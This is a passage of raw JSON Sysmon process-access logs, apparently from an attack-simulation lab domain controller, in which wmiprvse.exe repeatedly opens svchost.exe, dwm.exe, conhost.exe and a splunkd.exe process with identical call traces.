07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5799,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.487\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.487","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5800,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.487\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010D3D50000}\r\nTargetProcessId: 1396\r\nTargetImage: C:\\Windows\\system32\\dwm.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.487","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010D3D50000}","TargetProcessId":"1396","TargetImage":"C:\\Windows\\system32\\dwm.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5801,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.487\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010A6F30000}\r\nTargetProcessId: 1612\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.487","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010A6F30000}","TargetProcessId":"1612","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5802,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.487\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010C8050100}\r\nTargetProcessId: 1844\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.487","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010C8050100}","TargetProcessId":"1844","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5803,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.487\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-1F64-5F25-0000-00102B800100}\r\nTargetProcessId: 2388\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.487","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-1F64-5F25-0000-00102B800100}","TargetProcessId":"2388","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5804,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.487\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-1F69-5F25-0000-0010B7860200}\r\nTargetProcessId: 2956\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.487","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-1F69-5F25-0000-0010B7860200}","TargetProcessId":"2956","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5805,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.487\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-1F69-5F25-0000-0010BB890200}\r\nTargetProcessId: 3004\r\nTargetImage: C:\\Windows\\system32\\conhost.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.487","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-1F69-5F25-0000-0010BB890200}","TargetProcessId":"3004","TargetImage":"C:\\Windows\\system32\\conhost.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPC